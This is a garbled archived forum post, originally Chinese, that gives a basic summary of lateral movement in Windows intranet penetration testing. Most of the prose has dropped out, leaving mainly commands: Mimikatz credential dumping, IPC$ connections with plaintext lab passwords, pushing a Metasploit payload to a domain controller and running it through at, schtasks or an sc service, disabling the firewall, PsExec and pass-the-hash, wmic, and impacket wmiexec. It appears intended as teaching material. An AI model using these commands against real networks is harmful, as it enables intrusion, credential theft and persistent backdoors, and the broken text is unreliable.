[16014] 2020-10-26_内网渗透测试:内网横向移动基础总结

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2020-10-26_内网渗透测试:内网横向移动基础总结 W H O A M I   F r e e B u f   2 0 2 0 - 1 0 - 2 6 访 访 W i n d o w s W i n d o w s   7 d o u s e r D o t e s t 1 2 3
W i n d o w s   s e r v e r   2 0 0 8 W I N - E N S 2 V R 5 T R 3 N a d m i n i s t r a t o r L i u 7 8 9 6 3 W i n d o w s 7 W i n d o w s 7 W i n d o w s   s e r v e r   2 0 0 8 s o c k s 使 访 W i n d o w s s e r v e r   2 0 0 8 W i n d o w s   s e r v e r   2 0 0 8 H a s h H a s h P w D u m p 7 P w d u m p 7 C M D h a s h   ( L M N T L M ) P w d u m p 7 H A S H o p h c r a c k M i m i k a t z M i m i k a t z B e n j a m i n W i n d o w s   l s a s s . e x e   M i m i k a t z h a s h H a s h W i n d o w s N T L M   H a s h W i n d o w s P T H I P C I P C $ ( I n t e r n e t   P r o c e s s   C o n n e c t i o n )   N T 2 0 0 0 I P I P C   使 i p c $ 访 w i n 7 D C I P C w i n 7 D C I P C 便 w i n 7 访 D C p r i v i l e g e : : d e b u g             / /   d e b u g s e k u r l s a : : l o g o n p a s s w o r d s               / /   n e t   u s e   < D C I P > i p c $   " p a s s w o r d "   / u s e r : " u s e r n a m e " n e t   u s e   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0 i p c $   " L i u 7 8 9 6 3 "   / u s e r : " a d m i n i s t r a t o r " n e t   u s e   / /  
D C C D C C 使 n e t   u s e i p c $ 使 t a s k l i s t / S / U / P / s I P / u 使 / p   i p c $   1 3 9 4 4 5 i p c $ 使 i p c $ I P C c $ d i r   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0 c $ c o p y   C : U s e r s d o u s e r D e s k t o p w h o a m i . t x t   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0 c $ t a s k l i s t   / S   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   / U   a d m i n i s t r a t o r   / P   l i u 7 8 9 6 3 n e t   u s e   I P   / d e l   / y n e t   u s e   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0 c $   " L i u 7 8 9 6 3 "   / u s e r : " a d m i n i s t r a t o r "
D C C I P C 访 W i n d o w s   a t   a t   W i n d o w s W i n d o w s   S e r v e r   2 0 0 8 a t D C 1 .   i p c 2 .   使 n e t   t i m e D C 3 .   使 c o p y m e t a s p l o i t p a y l o a d C 4 .   使 a t D C m e t a s p l o i t I D 1 1 8 : 5 3 : 0 0 s h e l l . e x e 1 8 : 5 3 : 0 0 s h e l l . e x e m s f c o n s o l e m e t e r p r e t e r n e t   t i m e   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0 c o p y   s h e l l . e x e   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0 c $ a t   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   1 8 : 5 3 : 0 0   c : s h e l l . e x e
5 .   使 a t t y p e   s c h t a s k s   a t W i n d o w s   V i s t a W i n d o w s   S e r v e r   2 0 0 8 s c h t a s k s s c h t a s k s a t s c h t a s k s 使 使 s c h t a s k s a t s c h t a s k s 1 .   i p c 2 .   使 c o p y m e t a s p l o i t p a y l o a d s h e l l . e x e C 3 .   D C b a c k d o o r C s h e l l . e x e s y s t e m i p c / u / p s c h t a s k s 访 / u / p a t   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   1   / d e l e t e / /   1 I D a t   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   1 7 : 0 5 : 0 0   c m d . e x e   / c   " i p c o n f i g   >   C : U s e r s A d m i n i s t r a t o r r e s u l t . t x t " a t   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   1 7 : 0 5 : 0 0   c m d . e x e   / c   " < > "   >   r e s u l t . t x t t y p e   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0 c $ U s e r s A d m i n i s t r a t o r r e s u l t . t x t s c h t a s k s   / c r e a t e   / s   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   / t n   b a c k d o o r   / s c   m i n u t e   / m o   1     / t r   c : s h e l l . e x e   / r u   s y s t e m   / f s c h t a s k s   / c r e a t e   / s   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   / u   a d m i n i s t r a t o r   / p   L i u 7 8 9 6 3   / t n   b a c k d o o r   / s c   m i n u t e   / m o   1   / t r   c : s h e l l . e x e   / r u   s y s t e m   / f
4 .   m s f c o n s o l e D C m e t e r p r e t e r 5 .   s c h t a s k s t y p e t y p e r e s u l t . t x t 使 使 s c h t a s k s C : W i n d o w s T a s k s S c h e d L g U . t x t W i n d o w s 使 ( ) i p c   s c   w i n d o w s S C s e r v i c e s c 使 s c W i n d o w s I P C $ 访 1 .   D C i p c 2 .   使 c o p y m e t a s p l o i t p a y l o a d b i n d . e x e D C C 3 .   D C b a c k d o o r = 4 .   s c h t a s k s   / r u n   / s   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   / i   / t n   b a c k d o o r / /   i s c h t a s k s   / r u n   / s   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   / i   / t n   b a c k d o o r   / u   a d m i n i s t r a t o r   / p   L i u 7 8 9 6 3       / /   / u / p s c h t a s k s   / d e l e t e   / s   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   / t n   " b a c k d o o r "   / f s c h t a s k s   / c r e a t e   / s   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   / t n   t e s t   / s c   m i n u t e   / m o   1   / t r   " C : W i n d o w s S y s t e m 3 2 c m d . e x e   / c   ' w h o a m i   >   C : U s e r s A d m i n i s t r a t o r r e s u l t . t x t ' "   / r u   s y s t e m   / f s c h t a s k s   / r u n   / s   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   / i   / t n   t e s t s c   [ / I P ]   c r e a t e   [ s e r v i c e n a m e ]   b i n p a t h =   " [ p a t h ] "       # s c   W I N - E N S 2 V R 5 T R 3 N   c r e a t e   b i n d s h e l l   b i n p a t h =   " c : b i n d . e x e " s c   W I N - E N S 2 V R 5 T R 3 N   s t a r t   b i n d s h e l l
m s f 线 5 .   使 P s E x e c g o d . o r g W i n d o w s   7 W i n d o w s   S e r v e r   2 0 0 8 D C W i n d o w s   S e r v e r   2 0 0 3 W i n d o w s   S e r v e r   2 0 0 8 1 9 2 . 1 6 8 . 5 2 . 1 3 8 O W A l i u k a i f e n g 0 1 L i u f u p e n g 1 2 3 W i n d o w s   7 P s E x e c . e x e h t t p s : / / d o c s . m i c r o s o f t . c o m / z h - c n / s y s i n t e r n a l s / d o w n l o a d s / p s e x e c p s e x e c     w i n d o w s   p s e x e c 使 3 3 8 9 a d m i n $   ( ) p s e x e c 使 P s E x e c W i n d o w s P s E x e c 1 .   i p c $ p s e x e c s v c . e x e 2 .   S C M a n a g e r p s e x e c 3 .   4 .   p s e x e c 使 使   a d m i n $   a d m i n $ 使 a d m i n i s t r a t o r 使 ( a d m i n i s t r a t o r ) 访 访 s c   W I N - E N S 2 V R 5 T R 3 N   s t a r t   b i n d s h e l l s c   [ h o s t ]   d e l e t e   [ s e r v i c e n a m e ]       # s c   W I N - E N S 2 V R 5 T R 3 N   c r e a t e   u n a b l e f i r e w a l l   b i n p a t h =   " n e t s h   a d v f i r e w a l l   s e t   a l l p r o f i l e s   s t a t e   o f f " s c   W I N - E N S 2 V R 5 T R 3 N   s t a r t   u n a b l e f i r e w a l l
- a c c e p t e u l a p s e x e c 使 - u - p - s s y s t e m s y s t e m s h e l l 使 s h e l l D C S y s t e m S h e l l a d m i n i s t r a t o r i p c P s E x e c s h e l l M e t a s p l o i t P s E x e c m e t a s p l o i t p s e x e c 使 e x p l o i t / w i n d o w s / s m b / p s e x e c _ p s h p a y l o a d p o w e r s h e l l p o w e r s h e l l W i n d o w s e x p l o i t / w i n d o w s / s m b / p s e x e c e x e p a y l o a d W i n d o w s   7 W i n d o w s   S e r v e r   2 0 0 8 p o w e r s h e l l p o w e r s h e l l W i n d o w s   X P W i n d o w s   S e r v e r   2 0 0 3 使 e x p l o i t / w i n d o w s / s m b / p s e x e c e x e p a y l o a d e x p l o i t / w i n d o w s / s m b / p s e x e c 使 P s E x e c . e x e   - a c c e p t e u l a   1 9 2 . 1 6 8 . 5 2 . 1 3 8   - u   g o d l i u k a i f e n g 0 1   - p   L i u f u p e n g 1 2 3   - s   c m d . e x e P s E x e c . e x e   - a c c e p t e u l a   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   c m d . e x e P s E x e c . e x e   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   < C o m m a n d > P s E x e c . e x e   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   c m d . e x e   / c   " i p c o n f i g " P s E x e c . e x e   1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   - u   d e m o a d m i n i s t r a t o r   - p   L i u 7 8 9 6 3   c m d . e x e   / c   " i p c o n f i g " / /   c m d . e x e / c a t e x p l o i t / w i n d o w s / s m b / p s e x e c                       / /   p s e x e c , p s e x e c . e x e e x p l o i t / w i n d o w s / s m b / p s e x e c _ p s h               / /   使 p o w e r s h e l l p a y l o a d ( P s E x e c P o w e r S h e l l ) a u x i l i a r y / a d m i n s e t   r h o s t s   1 9 2 . 1 6 8 . 5 2 . 1 3 8 s e t   S M B D o m a i n   g o d s e t   S M B U s e r   L i u k a i f e n g 0 1 s e t   S M B P a s s   L i u f u p e n g 1 2 3               / /   P T H r u n
使 e x p l o i t / w i n d o w s / s m b / p s e x e c 使 使 p s e x e c p s e x e c p s e x e c W M I W M I W i n d o w s   M a n a g e m e n t   I n s t r u m e n t a t i o n W i n d o w s   9 8 W i n d o w s W M I W M I / n o d e 使 1 3 5 ( R P C ) 访 P s E x e c P s E x e c 使 W M I 使 w m i e x e c W i n d o w s W M I A P T 使 W M I W M I 使 W M I C 1 3 5 4 4 5 ( 1 3 5     W M I C     w i m c e x e c   使 4 4 5 ) W M I C a d m i n i s t r a t o r 1 9 2 . 1 6 8 . 1 8 3 . 1 3 0 ( D C ) i p c o n f i g C : r e s u l t . t x t w m i c t x t i p c $ w m i c / u s e r / p a s s w o r d w m i c i p c $ 使 t y p e 1 9 2 . 1 6 8 . 5 2 . 1 3 8 w m i c   / n o d e : 1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   / U S E R : a d m i n i s t r a t o r   P A T H   w i n 3 2 _ t e r m i n a l s e r v i c e s e t t i n g   W H E R E   ( _ _ C l a s s ! = " " )   C A L L   S e t A l l o w T S C o n n e c t i o n s   1 / /   w m i c   / n o d e : " [ f u l l   m a c h i n e   n a m e ] "   / U S E R : " [ d o m a i n ] [ u s e r n a m e ] " w m i c   / n o d e : 1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   / u s e r : a d m i n i s t r a t o r   / p a s s w o r d : L i u 7 8 9 6 3   p r o c e s s   l i s t   b r i e f w m i c   / n o d e : 1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   / u s e r : a d m i n i s t r a t o r   / p a s s w o r d : L i u 7 8 9 6 3   p r o c e s s   c a l l   c r e a t e   " c m d . e x e   / c   i p c o n f i g   >   C : r e s u l t . t x t " w m i c   / n o d e : 1 9 2 . 1 6 8 . 1 8 3 . 1 3 0   / u s e r : a d m i n i s t r a t o r   / p a s s w o r d / /   / n o d e t y p e   1 9 2 . 1 6 8 . 5 2 . 1 3 8 c $ r e s u l t . t x t
使 W M I C W M I C ( 1 3 5 W M I C ) W M I C w m i c 使 I P C $ t y p e W M I C w m i W M I E X E C w m i e x e c w i n d o w s w m i c w m i e x e c 使 使 W M I E X E C I m p a c k e t w m i e x e c . p y i m p a c k e t L i n u x W i n d o w s 使 s o c k s h t t p s : / / g i t h u b . c o m / C o r e S e c u r i t y / i m p a c k e t / b l o b / m a s t e r / e x a m p l e s / w m i e x e c . p y 使 D C ( 1 9 2 . 1 6 8 . 1 8 3 . 1 3 0 ) S h e l l D C ( 1 9 2 . 1 6 8 . 1 8 3 . 1 3 0 ) S h e l l w m i e x e c . p y - h a s h e s s o c k s 访 W i n d o w s   s e r v e r   2 0 0 8 W i n d o w s 7 s o c k s s o c k s W i n d o w s   s e r v e r   2 0 0 8 使 e a r t h w o r m W i n d o w s 7 s o c k s p y t h o n   w m i e x e c . p y   a d m i n i s t r a t o r : L i u 7 8 9 6 3 @ 1 9 2 . 1 6 8 . 1 8 3 . 1 3 0 / /   p y t h o n   w m i e x e c . p y   : @ I P e w _ f o r _ W i n . e x e   - s   s s o c k s d   - l   1 0 8 0
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则